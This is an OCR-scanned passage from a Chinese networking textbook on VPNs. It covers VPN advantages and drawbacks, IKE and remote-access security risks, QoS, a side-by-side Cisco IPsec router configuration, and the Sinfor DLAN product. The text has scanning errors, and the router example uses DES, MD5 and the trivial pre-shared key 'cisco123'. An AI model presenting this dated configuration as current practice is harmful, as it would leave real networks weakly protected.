并 允许 它 接 入 企业 总 部 即 可 。 与 新 的 合作 伙伴 之 间 的 连接 也 可 以 在 没有 业务 往来 
时 ,关闭 相应 的 VPN 功能 ,需要 连接 时 ,再 开放 连接 即 可 。 真 正 做 到 了 想 连 就 连 , 想 
断 就 断 。 

掌握 自主 权 : 企业 只 把 上 网 的 功能 交 给 ISP 完成 ,而 企业 内 部 的 IP 分 配 、 网 络 安全 、 
网 络 结构 的 变化 、 接 和 人 用户 的 设置 .访问 权限 的 设置 都 由 企业 自己 掌握 。 


2. VPN 的 缺点 


兼容 性 欠 佳 : 不 同 厂商 开发 的 VPN 产品 (包括 软件 和 硬件 ) ,在 协议 的 使 用 和 加 密 
算法 的 选择 上 都 略 有 不 同 ,所 以 在 架设 VPN 环境 时 ,最 好 选用 企业 已 经 使 用 的 产 
品 ,已 便 保 持 产品 的 兼容 性 。 

相应 的 应 用 产品 不 够 丰富 : 如 很 多 VPN 产品 支持 网 页 性 质 的 应 用 ,但 目前 很 多 企 
业 还 没有 自己 的 办 公 自 动 化 系统 ,一 些 财务 软件 也 只 支持 客户 端 /服务 器 结构 。 还 
有 一 些 企业 使 用 的 软件 应 用 了 特殊 的 协议 ,在 VPN 隧道 中 也 不 被 支持 。 
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。 对 公 网 依赖 性 过 强 , 稳 定性 不 如 专线 : 不 可 否认 基于 公 网 的 VPN 产品 对 公 网 的 依 
赖 性 较 强 ,而 公 网 的 稳定 性 又 不 受 企 业 自身 的 控制 ,一 些 企业 的 上 网 出 口 也 是 和 别 
人 共享 的 。 这 也 是 有 些 用 户 反 映 VPN 网 络 不 如 原来 专线 网 络 快 的 原因 。 


13.7 VPN 面临 的 安全 问题 


13.71 IKE 协 议 并 不 十 分 安全 


IKE 是 由 IPSec 组 成 的 众多 协议 之 一 ,而 IPSec 已 被 企业 广泛 用 于 通过 Internet 建立 
VPN。IKE 可 以 对 VPN 信道 进行 认证 ,并 决定 在 会 话 中 使 用 哪 种 加 密 方式 和 认证 算法 ,来 
产生 加 密 密 钥 并 对 它们 进行 管理 等 。 

虽然 ,使 用 IKE 的 厂商 已 经 证 明 它 是 足够 安全 的 ,但 是 ,IETF 的 安全 专家 担心 ,由 于 
IKE 过 于 复杂 ,以 至 于 难以 证 明 它 是 安全 的 。 他 们 推荐 发 展 一 种 新 型 的 下 一 代 IKE 协议 
工作 组 的 成 员 将 其 称 为 子 IKE。 安 全 专家 正 致 力 于 发 展 他 们 称 之 为 JFK (Just Fast 
Keying) 的 IKE 的 替代 品 。 这 种 称 为 子 IKE(Son of IKE) 的 协议 , 它 的 设计 思想 主要 是 修改 
已 认识 到 的 IKE 的 缺陷 。 

对 IKE 的 改进 主要 有 两 方面 的 工作 。 一 方面 的 改进 是 支持 VPN 流量 通过 网 络 地 址 转 
换 (NAT) 时 的 防火 墙 能 力 。 实 际 上 ,虽然 VPN 网 络 对 NAT 技术 一 向 支持 的 不 好 ,但 是 现 
在 有 些 厂商 已 经 能 够 利用 自己 的 办 法 来 避免 这 些 问题 的 产生 。 第 二 方面 的 改进 是 支持 流 控 
制 传输 协议 (Stream Control Transmission Protocol,SCTP) ,这 个 协议 允许 不 同 的 组 件 被 视 
为 一 个 单独 SCTP 会 话 中 的 独立 流 , 因 而 能 够 提高 复杂 Web 页 的 传输 。 

虽然 ,提出 一 个 稳定 的 标准 需要 花费 很 长 的 时 间 ,但 是 这 种 标准 是 必需 的 。 而 且 , 不 同 
厂商 生产 的 设备 的 互 用 性 也 是 一 个 问题 。 这 个 宛 长 的 过 程 并 不 十 分 理想 ,但 它 是 不 可 避免 
的 。 小 型 VPN 设备 制造 商 一 般 主 动 与 大 型 厂商 一 起 努力 解决 互 用 性 问题 ,因而 他 们 的 设 
备 更 具 吸 引力 。 当 然 ,解决 互 用 性 的 问题 仍然 需要 一 定 的 时 间 和 一 定 的 技能 。 这 也 就 意 
味 着 客户 会 坚持 使 用 一 个 厂商 生产 的 设备 ,或 者 使 用 已 解决 了 互 用 性 问题 的 多 个 厂商 的 
设备 。 


13.72 部 署 VPN 时 的 安全 问题 


安全 问题 是 VPN 的 核心 问题 。 目 前 ,VPN 的 安全 保证 主要 是 通过 防火 墙 技术 .路 由 器 
配置 隧道 技术 ,加密 协议 和 安全 密 钥 来 实现 的 ,可 以 保证 企业 员工 安全 地 访问 公司 网 络 。 

但 是 ,如 果 一 个 企业 的 VPN 需要 扩展 到 远程 访问 时 ,就 要 注意 ,这 些 对 公司 网 络 直接 
或 始终 在 线 的 状态 将 会 是 黑客 攻击 的 主要 目标 。 因 为 远程 工作 人 员 可 以 通过 防火 墙 之 外 的 
个 人 计算 机 接触 到 公司 预算 .战略 规划 以 及 工程 项 目 等 核心 内 容 ,这 就 构成 了 公司 安全 防御 
系统 中 的 弱点 。 虽 然 员 工 可 以 因此 提高 其 工作 效率 ,但 同时 也 为 黑客 .竞争 对 手 以 及 商业 间 
谍 提 供 了 无 数 进入 公司 核心 网 络 的 机 会 。 

但 是 企业 并 没有 对 远 距 离 工作 的 安全 性 予以 足够 的 重视 。 大 多 数 公司 认为 ,公司 网 络 
处 于 一 道 网 络 防火 墙 之 后 就 是 安全 的 ,员工 可 以 拨号 进入 系统 ,而 防火 墙 会 将 一 切 非法 请 求 
拒 之 门 外 。 还 有 一 些 网 络 管理 员 认为 ,为 网 络 建立 防火 墙 , 并 为 员工 提供 VPN ,使 他 们 可 以 
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通过 一 个 加 密 的 隧道 拨号 进入 公司 网 络 就 是 安全 的 。 这 些 看 法 都 是 不 对 的 。 

从 安全 的 观点 来 看 ,在 家 办 公 是 一 种 极 大 的 威胁 ,因为 公司 使 用 的 大 多 数 安全 软件 并 没 
有 为 个 人 计算 机 提供 保护 。 一 些 员工 所 做 的 仅仅 是 打开 一 台 个 人 计算 机 ,使 用 它 通过 一 条 
授权 的 连接 进入 公司 网 络 系统 。 虽 然 , 公 司 的 防火 墙 可 以 将 侵入 者 隔离 在 外 ,并 保证 主要 办 
公 室 和 家 庭 办 公 室 之 间 VPN 的 信息 安全 。 但 问题 在 于 ,侵入 者 可 以 通过 一 个 受信 任 的 用 
户 进入 网 络 。 因 此 ,虽然 加 密 的 隧道 是 安全 的 ,连接 也 是 正确 的 ,但 这 并 不 意味 着 个 人 计算 
机 是 安全 的 。 

黑客 为 了 侵入 员工 的 个 人 计算 机 ,需要 探测 IP 地 址 。 统 计 表 明 ,使 用 拨号 连接 的 IP 地 
址 几乎 每 天 都 受到 黑客 的 扫描 。 因 此 ,如 果 在 家 办 公 人 员 具 有 一 条 诸如 xDSL 的 不 间断 连 
接 链 路 (通常 这 种 连接 具有 一 个 固定 的 IP 地 址 ) ,会 使 黑客 的 入 侵 更 为 容易 。 因 为 ,拨号 连 
接 在 每 次 接 人 时 都 被 分 配 不 同 的 IP 地 址 ,虽然 它 也 能 被 侵入 ,但 相对 要 困难 一 些 。 一 旦 黑 
客 侵入 了 个 人 计算 机 ,他 便 能 够 远程 运行 员工 的 VPN 客户 端 软件 。 因 此 ,必须 有 相应 的 解 
决 方案 堵 住 远程 访问 VPN 的 安全 漏洞 ,使 员工 与 网 络 的 连接 既 能 充分 体现 VPN 的 优点 ， 
又 不 会 成 为 安全 的 威胁 。 在 个 人 计算 机 上 安装 个 人 防火 墙 是 极为 有 效 的 解决 方法 , 它 可 以 
阻止 非法 侵入 者 进入 公司 网 络 。 下 面 是 提供 给 远程 工作 人 员 的 实际 解决 方法 。 

。 所 有 远程 工作 人 员 必 须 被 批准 才能 使 用 VPN。 

。 所 有 远程 工作 人 员 需 要 有 个 人 防火 墙 , 它 不 仅 防止 计算 机 被 侵入 ,还 能 记录 连接 被 
扫描 了 多 少 次 。 
所 有 的 远程 工作 人 员 应 具有 入 侵 检测 系统 ,提供 对 黑客 攻击 信息 的 记录 。 
监控 安装 在 远程 系统 中 的 软件 ,并 将 其 限制 为 只 能 在 工作 中 使 用 。 
。 IT 人 员 需 要 对 这 些 系统 进行 与 办 公 室 系统 同样 的 定期 性 预期 检查 。 
。 外 出 工作 人 员 应 对 敏感 文件 进行 加 密 。 
安装 要 求 输入 密码 的 访问 控制 程序 ,如 果 输 入 密码 错误 , 则 通过 modem 向 系统 管理 
员 发 出 警报 。 
。 当选 择 DSL 供应 商 时 ,应 选择 能 够 提供 安全 防护 功能 的 供应 商 。 


13.8 实现 VPN 的 QoS 技术 


VPN 网 应 当 为 企业 数据 提供 不 同等 级 的 服务 质量 保证 。 不 同 的 用 户 和 业务 对 服务 质 
量 保 证 的 要 求 差别 较 大 ,如 移动 办 公用 户 ,提供 广泛 的 连接 和 覆盖 性 是 保证 VPN 服务 的 一 
个 主要 因素 ; 而 对 于 拥有 众多 分 支 机 构 的 专线 VPN 网 络 ,交互 式 的 内 部 企业 网 应 用 则 要 求 
网 络 能 提供 良好 的 稳定 性 ; 对 于 其 他 应 用 (如 视频 等 ) 则 对 网 络 提 出 了 更 明确 的 要 求 ,如 网 
络 时 延 及 误 码 率 等 。 所 有 以 上 网 络 应 用 均 要 求 网 络 根据 不 同 的 需要 提供 不 同等 级 的 服务 
质量 。 

在 网 络 优化 方面 ,构建 VPN 的 另 一 重要 需求 是 ,充分 有 效 地 利用 有 限 的 广域网 资 
源 ,为 重要 数据 提供 可 靠 的 带宽 。 广 域 网 流量 的 不 确定 性 使 其 带宽 的 利用 率 很 低 , 在 流 
量 高 峰 时 引起 网 络 阻塞 ,产生 网 络 瓶 颈 ,使 实时 性 要 求 高 的 数据 得 不 到 及 时 发 送 ;而 在 流 
量 低谷 时 又 造成 大 量 的 网 络 带宽 空闲 。QoS 通过 流量 预测 与 流量 控制 策略 ,可 以 按照 优 
先 级 分 配 带宽 资源 ,实现 带宽 管理 ,使 各 类 数据 能 够 被 合理 地 先后 发 送 ,并 预防 阻塞 的 
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发 生 。 
13.9 在 路 由 器 上 配置 VPN 


目前 ,几乎 所 有 的 网 络 硬件 设备 都 支持 


VPN 技术 ,如 Cisco 公司 的 Cisco 系列 路 由 器 


在 更 新 支持 VPN 功能 的 IOS 版 本 后 , 即 可 连接 VPN 网 络 。 现 在 把 连接 VPN 网 络 两 端的 
Cisco 路 由 器 的 配置 表 进 行 一 下 对 比 , 如 表 13. 6 所 示 。 从 表 13. 6 中 ,可 以 看 出 VPN 的 配置 
命令 基本 上 是 相同 的 ,只 是 IP 地 址 指向 对 方 的 IP。 但 不 能 就 此 认为 配置 Cisco 公司 的 
VPN 网 络 是 一 件 简单 的 事情 ,在 Cisco 公司 的 路 由 器 上 配置 及 部 署 VPN 网 络 还 需要 考虑 


很 多 问题 ,如 线路 封装 模式 的 统一 、 相 连 端 口 
要 丰富 的 实践 经 验 和 踏实 细心 的 工作 作风 。 
表 13.6 配置 
左边 的 路 由 器 


IP 地 址 的 规划 和 相关 安全 策略 的 设计 等 ,都 需 


VPN 命令 对 比 表 
右边 的 路 由 器 


crypto isakmp policy 1 


crypto isakmp policy 1 


注释 : policy 1 表示 策略 1, 如 果 和 希望 配置 多 个 VPN, 可 以 写成 policy 1,policy 2,… 


hash md5 


hash md5 


authentication pre-share 


authentication pre-share 


注释 : 告诉 路 由 器 要 使 用 预先 共享 的 密码 


crypto isakmp key ciscol23 address 202. 96. 
15. 88 
! 


crypto isakmp key cisco123 address 61. 153. 158. 44 
! 


注释 : 返回 到 全 局 模式 下 ,确定 要 使 用 的 预先 共享 


密 钥 和 指定 VPN 另 一 端 路 由 器 的 IP 地 址 


crypto IPSec transform-set rtpset esp-des esp- 
md5-hmac 
! 


crypto JPSec transform-set rtpset esp-des esp- 
md5-hmac 
! 


注释 : 这 里 在 两 端 路 由 器 唯一 不 同 的 参数 是 rtpse 


t, 可 以 相同 ,也 可 以 不 同 。 这 个 命令 是 在 定义 IPSec 


使 用 的 参数 ,为 了 加 强 安全 性 ,要 启动 验证 报头 。 由 于 两 个 网 络 都 使 用 私有 地 址 空间 ,需要 通过 隧道 传 


输 数 据 ,因此 还 要 使 用 安全 封装 协议 。 最 后 还 要 定 


义 DES 作为 保密 密 钥 的 加 密 算法 


crypto map rtp 1 IPSec-isakmp 


crypto map rtp 1 IPSec-isakmp 


注释 : 定义 生成 新 保密 密 钥 的 周期 。 要 设置 一 个 较 短 的 密 钥 更 新 周期 。 这 个 命令 必须 在 VPN 两 端的 


路 由 器 上 进行 配置 。 参 数 RTP 是 给 这 个 配置 定义 


的 名 称 , 后 面 会 将 它 与 路 由 器 的 外 部 接口 建立 关联 


set peer 202. 96. 15. 88 


set peer 61. 153. 158. 44 


注释 : 这 是 标识 对 方 路 由 器 的 合法 IP 地 址 。 在 对 方 (远程 ) 路 由 器 上 也 要 输入 类 似 的 命令 


set transform-set rtpset 


set transform-set rtpset 


match address 102 
! 


match address 102 
| 


注释 : 这 两 个 命令 分 别 表示 用 于 这 个 连接 的 传输 设置 和 访问 列表 


interface Ethernet0/0 


interface Ethernet0/0 


ip address 192. 168. 1. 1 255. 255. 255. 0 


ip address 192. 168. 2. 1 255. 255. 255. 0 


no ip directed-broadcast 


no ip directed-broadcast 


左边 的 路 由 器 
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续 表 
右边 的 路 由 器 


ip nat inside 
! 


ip nat inside 
! 


interface Ethernet0/1 


interface Ethernet0/1 


ip address 61. 153. 158. 44 255. 255. 255. 0 


ip address 202. 96. 15. 88 255. 255. 255. 0 


no ip directed-broadcast 


no ip directed-broadcast 


ip nat outside 


ip nat outside 


no ip route-cache 


no ip route-cache 


no ip mroute-cache 


no ip mroute-cache 


crypto map rtp 


crypto map rtp 


注释 : 将 刚才 定义 的 密码 图 应 用 到 路 由 器 的 外 部 接口 上 


ip nat inside source route-map nonat interface 
Ethernet0/1 overload 


ip nat inside source route-map nonat interface 


Ethernet0/1 overload(nonat 只 是 个 名 字 ) 


ip classless 


ip classless 


ip route 0. 0. 0.0 0.0.0.0 61.153.158. 4x( 网 关 ) 


ip route 0. 0. 0. 0 0. 0. 0.0 202. 96. 15. 8x( 网 关 ) 


no ip http server 


no ip http server 


access-list 101 deny ip 192. 168. 1. 0 0. 0. 0. 255 
192. 168. 2. 0 0. 0. 0. 255 


access-list 101 deny ip 192. 168. 2. 0 0. 0. 0. 255 192. 
168. 1.0 0.0.0.255 


access-list 101 permit ip 192. 168. 1. 0 0. 0. 0. 
255 any 


access-list 101 permit ip 192. 168. 2. 0 0. 0. 0. 
255 any 


access-list 102 permit ip 192. 168. 1. 0 0. 0. 0. 255 
192. 168. 2. 0 0. 0. 0. 255 


access-list 102 permit ip 192. 168. 2. 0 0. 0. 0. 255 
192. 168. 1.0 0. 0.0. 255 


在 这 里 使 用 的 访问 控制 列表 不 能 与 任何 过 滤 访 问 
规则 


列表 相同 ,应 该 使 用 不 同 的 访问 列表 号 来 标识 VPN 


route-map nonat permit 10 


route-map nonat permit 10 


match ip address 102 


match ip address 102 


13.10 软件 VPN 与 硬件 VPN 的 比较 


与 硬件 VPN 产品 相 比 ,软件 VPN 产品 


具有 下 面 几 点 优势 。 


。 成 本 低 : 软件 的 成 本 相对 硬件 要 低 很 多 。 同 时 以 后 的 维护 和 升级 费用 以 及 加 密 算 


法 的 更 新 费用 也 相应 要 少 很 多 。 


。 实施 方便 : 软件 产品 在 部 署 设 施 和 环境 上 ,以 及 在 部 署 速度 上 都 要 比 硬件 产品 部 署 快 。 

。 融合 性 强 : 目前 的 VPN 软件 一 般 都 集成 了 路 由 功能 、 防 火 墙 功能 和 QoS 功能 。 而 
且 VPN 软件 可 以 和 已 有 的 数据 库 服务 器 、 网 站 服务 器 安装 在 一 起 ,节省 了 一 定 的 费 
用 。 而 硬件 VPN 产品 相应 功能 比较 单一 ,与 其 他 产品 的 结合 性 也 略 差 一 些 。 


13.11 Sinfor DLAN 产品 简介 


Windows 自 带 的 VPN 功能 较为 简单 ,其 客户 端 采用 PPTP 或 IPSec 协议 接 入 总 部 实 
现 点 对 网 及 网 对 网 的 连接 。 在 用 户 需求 多 样 化 的 今天 ,Windows 自 带 的 VPN 功能 更 加 显 
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示 出 它 的 不 足 。 以 下 是 Windows 自 带 的 VPN 的 几 点 不 足 之 处 。 


Windows 自 带 的 VPN 不 支持 动态 IP, 尤 其 是 必须 保证 总 部 拥有 一 个 公 网 IP 地 址 ， 
而 且 在 使 用 IPSec 协议 时 无 法 穿 透 NAT 网 络 ,使 用 局 限 性 较 大 。 

Windows 自 带 的 VPN 使 用 系统 自 带 的 用 户 认 证 体系 ,而 Windows 2000 的 用 户 身份 认 
证 方式 非常 简单 ,只 能 使 用 用 户 名 密码 这 种 验证 方式 ,所 以 很 可 能 被 竞争 对 手 或 黑客 
盗用 而 进入 网 络 , 内 部 员工 离职 或 商业 间谍 也 很 容易 通过 泄漏 的 密码 入 侵 公 司 网 站 。 
Windows 自 带 的 VPN 几乎 无 法 支持 在 总 部 端 存在 多 个 子 网 的 情况 。 

Windows 自 带 的 VPN 仅 能 支持 DES(56 位 ) 加 密 算法 ,安全 性 和 性 能 远 远 达 不 到 用 
户 的 需求 。 

Windows 自 带 的 VPN 部 署 和 维护 需要 用 户 非常 了 解 Windows 系统 ,从 而 大 大 提高 
用 户 在 实施 和 维护 方面 的 成 本 。 

Windows 自 带 的 VPN 只 是 Windows 的 附带 功能 ,从 Windows 2000 到 Windows 
2003, 在 VPN 特性 上 都 没有 大 的 变化 ,技术 更 新 较 慢 。 


现在 要 介绍 的 第 三 方 国产 VPN 软件 Sinfor DLAN, 更 贴近 国内 用 户 的 需求 ,相对 
Microsoft 公司 的 VPN 产品 , 它 具 有 以 下 几 个 特点 。 


. 


. 


Sinfor DLAN 支持 动态 IP 和 穿 透 NAT 防火 墙 ,并 且 总 部 可 以 在 没有 Internet IP 
的 情况 下 工作 。 

Sinfor DLAN 可 以 支持 集团 用 户 的 多 级 复杂 网 络 。 

Sinfor DLAN 使 用 了 最 新 的 AES(128 位 ) 加 密 算 法 ,具有 比 3DES 更 好 的 安全 性 和 
更 快 的 速率 。 

Sinfor DLAN 集成 了 企业 级 防火 墙 上 网 控制 和 路 由 功能 ,一 次 性 提供 多 种 宽带 安 
全 的 解决 方案 ,同时 ,简单 的 使 用 界面 ,降低 了 实现 远程 实施 和 维护 的 成 本 。 


Sinfor DLAN 由 总 部 模式 (MDLAN)、 分 支 机 构 模 式 (SDLAN) 和 移动 用 户 模式 
(PDLAN) 三 种 模式 组 成 ,以 下 是 对 这 三 种 模式 的 介绍 。 


. 


总 部 模式 : MDLAN 运行 在 公司 总 部 局 域 网 接 入 Internet 上 的 计算 机 或 服务 器 上 。 
集成 了 企业 防火 墙 、 代 理 上 网 和 访问 控制 功能 。 支 持 任何 一 种 Internet 接 人 方式 
(如 modem 拨号 、ISDN、ADSL 和 宽带 等 ), 支 持 动态 IP、 宽 带 内 部 IP 地 址 。 
MDLAN 与 其 他 MDLAN 之 间 以 及 MDLAN 与 SDLAN 或 PDLAN 之 间 都 可 以 
建立 VPN 隧道 。 

分 支 机 构 模 式 : SDLAN 运行 在 公司 的 分 支 机 构 接 入 Internet 的 计算 机 或 服务 器 
上 。 同 样 集成 了 企业 防火 墙 \ 代 理 上 网 和 访问 控制 功能 。 支 持 任何 一 种 Internet 接 
入 方式 (如 modem 拨号 ISDN、ADSL 和 宽带 等 ) ,支持 动态 IP、 宽 带 内 部 IP 地 址 
(但 总 部 MDLAN 与 分 支 SDLAN 不 能 同时 为 宽带 内 部 IP 地 址 ) 。SDLAN 可 以 同 
时 与 多 个 MDLAN 建立 VPN 隧道 。 

移动 用 户 模式 : PDLAN 运行 在 移动 用 户 的 计算 机 上 (如 出 差 人 员 的 便携 机 、 在 家 办 
公 的 计算 机 等 ), 仅 提供 VPN 连接 功能 。 支 持 任 何 一 种 Internet 接 人 方式 (如 
modem 拨号 ISDN、ADSL 和 宽带 等 ) ,支持 动态 IP、 宽 带 内 部 IP 地 址 (但 总 部 
MDLAN 与 移动 PDLAN 不 能 同时 为 宽带 内 部 IP 地址 )。PDLAN 可 以 同时 与 多 个 
MDLAN 建立 VPN 隧道 。 
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13.11.1 网 络 环境 准备 


1. 上 网 方式 


Sinfor DLAN 能 够 支持 目前 常见 的 各 种 上 网 方式 ,包括 ADSL (或 xDSL) ISDN、 
modem, 大 楼 宽带 、 城 域 网 ,cable modem( 有 线 网 ), 以 及 WLAN、GPRS 和 CDMA 等 多 种 无 
线 上 网 方式 。 

需要 注意 的 是 ,如 果 两 个 网 络 需 要 互联 , 则 至 少 有 一 个 网 络 需 要 具备 Internet 有 效 IP 
地 址 (可 以 是 动态 分 配 的 IP 地 址 ,但 在 Internet 上 应 该 能 直接 访问 到 ,如 ADSL 拨号 上 网 获 
取 的 IP 地 址 等 ) 。 

例如 ,一 个 公司 总 部 采取 ADSL 拨号 上 网 ,并 具备 了 Internet 上 有 效 的 动态 IP 地 址 ,如 
果 各 分 公司 和 移动 用 户 需要 和 总 部 互联 ,那么 各 分 公司 和 移动 用 户 可 以 采取 任何 一 种 上 网 
方式 ,公司 总 部 都 不 受 影响 。 

如 果 一 个 公司 总 部 采取 大 楼 宽带 上 网 ,而 大 楼 分 配 的 是 私有 地 址 (如 192. 168. 0. 1) ,这 
时 各 分 公司 和 移动 用 户 如 果 需 要 和 总 部 互联 , 则 必须 具备 Internet 上 有 效 的 IP 地 址 (如 
ADSL 或 modem 拨号 ) 。 如 果 分 公司 也 是 私有 地 址 (如 192. 168. 0. 2) , 则 无 法 与 总 部 建立 
VPN 连接 。 

为 什么 DLAN 要 求 总 部 或 分 支 (移动 ) 至 少 有 一 方 拥有 动态 Internet IP? 

在 Internet 上 ,IP 是 用 来 寻找 目标 地 址 的 重要 信息 (就 像 生活 中 的 门牌 地 址 一 样 ), 如 
果 总 部 和 分 支 (移动 ) 都 没有 Internet IP, 也 就 是 说 在 Internet 上 总 部 和 分 支 都 是 不 可 见 的 ， 
那 又 怎 能 实现 总 部 、 分 支 (移动 ) 双 方 的 VPN 连接 呢 ? Sinfor DLAN 采用 了 独到 的 动态 寻 
址 技术 ,能 够 支持 总 部 没有 Internet IP( 但 是 同时 要 求 所 有 的 分 支 和 移动 用 户 必 须 有 动态 的 
Internet IP) ,为 了 降低 接 入 Internet 的 成 本 和 提高 VPN 连接 的 效率 ,推荐 在 总 部 端 拥 有 动 
态 的 Internet IP, 这 样 分 支 和 移动 用 户 就 能 以 任意 方式 接 入 Internet 进行 VPN 应 用 了 , 支 
持 ADSL、ISDN、modem、 大 楼 (小 区 ) 宽 带 、cable modem、WLAN、GPRS、CDMAI1x 等 多 种 
上 网 方式 。 


2. 代理 方式 


Sinfor DLAN 支持 采用 代理 服务 器 的 上 网 方式 ,直接 将 Sinfor DLAN 软件 安装 在 代理 
服务 器 上 。 

同时 ,Sinfor DLAN 内 置 了 “路 由 ”功能 。 当 采用 硬件 设备 代理 上 网 时 (如 共享 上 网 
器 防火 墙 和 路 由 器 等 设备 ) , 则 可 以 将 Sinfor DLAN 安装 在 局 域 网 内 部 的 计算 机 上 ,启用 
内 置 的 “路 由 ”功能 即 可 。 但 这 时 系统 将 认为 Sinfor DLAN 获得 的 是 私有 IP 地 址 。 如 果 
硬件 代理 上 网 的 设备 能 够 支持 NAT 端口 映射 (有 时 也 称 为 DMZ 或 Virtual Server) , 则 只 
需 配 置 Sinfor DLAN 系统 的 三 个 端口 ,系统 则 认为 具备 了 与 硬件 代理 设备 相同 的 IP 
地 址 。 


3. IP 地 址 规划 
需要 互联 的 不 同 网 络 站 点 (如 总 部 与 分 公司 ).IP 地 址 必须 在 不 同 网 段 ,并 设置 相同 的 
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子 网 掩 码 。 例 如 ,总 部 IP 地 址 为 192. 168. 0. * , 子 网 掩 码 为 255. 255. 255. 0; 分 公司 IP 地 
址 为 192. 168. 1. * , 子 网 掩 码 同样 也 是 255. 255. 255. 0( 如 果子 网 掩 码 为 255. 255. 0. 0, 设 
置 IP 地 址 时 在 第 二 位 就 必须 不 同 ,如 总 部 为 192. 168. 0. * , 则 分 支 必须 为 192. 169. 0. * ) 。 

为 什么 Sinfor DLAN 要 求 总 部 与 分 支 处 于 不 同 网 段 ? 

当 总 部 与 分 支 处 于 同一 网 段 时 ,数据 的 发 送 首先 在 本 地 局 域 网 内 使 用 ARP 协议 寻找 
目标 地 址 , 当 目 标 地 址 不 在 本 网 内 是 此 数据 将 被 丢弃 (实际 上 此 时 这 个 地 址 是 VPN 上 的 远 
端 网 络 内 的 地 址 ) ,在 总 部 与 分 支 是 不 同 网 段 的 情况 下 ,所 有 目标 地 址 是 非 本 网 网 段 的 数据 
包 全 部 会 被 发 送 到 网 关 计 算 机 (DLAN) 上 ,就 能 够 被 DLAN 截获 进行 VPN 发 送 处 理 。 


4. 网 关 设 置 


局 域 网 内 所 有 需要 建立 VPN 通道 .访问 远程 网 络 的 计算 机 ,网 关 都 要 设 为 安装 Sinfor 
DLAN 软件 的 计算 机 。 例 如 ,DLAN 软件 安装 在 IP 地 址 为 192. 168. 0. 1 的 计算 机 上 , 则 局 
域 网 内 的 计算 机 都 将 网 关 设 为 192. 168. 0. 1。 

为 什么 DLAN 要 求 工 作 在 网 关上 ,如 果 不 能 工作 在 网 关上 如 何 解决 ? 

本 问题 与 问题 2 有 一 定 相关 性 ,由 于 总 部 与 分 支 不 在 同一 网 段 ,所 有 非 本 网 的 数据 会 
全 部 被 发 送 到 本 网 网 关上 ,为 了 是 DLAN 能 够 截获 这 些 数据 ,就 需要 将 DLAN 安装 在 网 
关 计 算 机 上 。 在 某 些 特殊 情况 下 (如 某 些 拥 有 多 个 路 由 网 关 的 复杂 网 络 ) ,DLAN 无 法 被 
指定 为 网 关 ,那么 就 需要 在 希望 通过 DLAN 连 入 VPN 的 计算 机 上 进行 路 由 配置 ,以 使 到 
对 应 分 支 (假设 为 192. 168. 1. * 网 段 ) 的 数据 能 被 正确 的 发 送 到 DLAN 所 在 计算 机 上 ( 假 
设 为 192. 168. 0. 254), 具 体 配置 如 下 : route add 192. 168. 1. 0 mask 255. 255. 255. 0 
192. 168. 0. 254-P,-P 参数 表示 长 时 间 有 效 ,即使 计算 机 重启 也 能 保持 生效 。 


13.112 安装 环境 准备 


Sinfor DLAN 支持 Windows 98、Windows 2000( 全 系列 )、Windows XP( 全 系列 ) 以 及 
Windows 2003 操作 系统 ,并 将 对 Microsoft Windows 后 续 版 本 进行 同步 支持 。 

Sinfor DLAN 支持 各 种 语言 版 本 的 操作 系统 。 如 果 操 作 系 统 为 简体 中 文 版 本 , 则 
Sinfor DLAN 在 安装 时 会 自动 选择 简体 中 文 版 本 ; 如 果 操 作 系 统 为 繁体 中 文 版 ,英文 版 或 
其 他 版 本 , 则 Sinfor DLAN 在 安装 时 会 自动 选择 英文 版 本 。 

Windows 2000 系列 操作 系统 需要 提前 安装 Service Pack 2(SP2) 补 丁 。 

推荐 使 用 Windows 2000 或 Windows XP 操作 系统 , Intel Pentium 轩 以 上 CPU， 
128MB 以 上 内 存 的 配置 ,作为 Sinfor DLAN 的 软 、 硬 件 平台 。 


13.12 VPN 网 络 自 建 还 是 外 包 


由 于 VPN 低廉 的 使 用 成 本 和 良好 的 安全 性 ,无 论 是 拥有 多 个 办 事 处 或 分 支 机 构 的 大 
型 企业 ,还 是 资金 有 限 的 中 小 企业 ,都 有 适合 自己 的 VPN 策略 。 但 是 VPN 网 络 的 建设 是 
采用 自 建 方式 还 是 外 包 , 却 存在 很 大 的 差异 。 当 然 ,不 论 采 用 哪 种 VPN 建设 方式 ,它们 都 
有 一 个 基本 目标 ,就 是 在 提供 与 现 有 专用 网 络 基础 设施 相当 或 更 高 的 可 管理 性 、 可 扩展 性 以 
及 简单 性 的 基础 之 上 ,进一步 扩展 公司 的 网 络 连 接 。 
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13.121 大 型 企业 自 建 VPN 


大 型 企业 用 户 由 于 有 雄厚 的 资金 投入 做 保证 ,可 以 自己 建立 VPN, 将 VPN 设备 安装 在 
其 总 部 和 分 支 机 构 中 ,将 各 个 机 构 低 成 本 且 安 全 地 连接 在 一 起 。 企 业 建立 自己 的 VPN, 最 
大 的 优势 在 于 高 可 控 性 ,尤其 是 基于 安全 基础 之 上 的 控制 。 一 个 内 部 VPN 能 使 企业 对 所 
有 的 安全 认证 、 网 络 系统 以 及 网 络 访问 情况 进行 控制 ,并 建立 端 到 端的 安全 结构 ,集成 和 协 
调 现 有 的 内 部 安全 技术 。 

同时 ,企业 还 可 以 确保 得 到 业内 最 好 的 技术 以 满足 自身 的 特殊 需要 ,这 要 优 于 ISP 所 提 
供 的 普通 服务 。 而 且 , 建 立 内 部 VPN 能 使 企业 有 效 节省 VPN 的 运作 费用 。 企 业 可 以 节省 
用 于 外 包 管 理 设备 的 额外 费用 ,并 且 能 将 现 有 的 远程 访问 和 端 到 端的 网 络 集成 起 来 ,以 获取 
最 佳 性 价 比 的 VPN。 

而 相 比 之 下 ,VPN 项 目 外 包 可 以 避免 技术 过 时 ,但 这 并 不 意味 着 企业 可 以 节省 开支 。 
因为 企业 最 终 要 为 高 额 产 品 支 付费 用 ,用 来 作为 使 用 新 技术 的 代价 ,而 且 企 业 网 络 越 大 , 支 
付 给 承包 公司 的 费用 越 多 。 同 时 ,VPN 项 目 外 包 降 低 了 企业 对 公司 内 网 的 控制 等 级 。 所 
以 , 自 建 VPN 是 大 型 企业 的 最 好 选择 。 


13.122 中 小 型 企业 外 包 VPN 


虽然 每 个 中 小 型 企业 都 是 相对 集中 和 固定 的 ,但 是 部 门 与 部 门 之 间 \ 企 业 与 其 客户 之 间 
的 联系 依然 需要 廉价 而 安全 的 信息 沟通 。 中 小 型 企业 如 果 自 己 购买 VPN 设备 , 则 财务 成 
本 较 高 ,而 且 一 般 中 小 型 企业 的 IT 人 员 短 缺 , 技 术 水 平 不 高 和 资金 能 力 有 限 等 缺点 ,使 它 
们 不 足以 支持 VPN, 所 以 外 包 VPN 项 目 对 中 小 企业 是 较 好 的 选择 。 
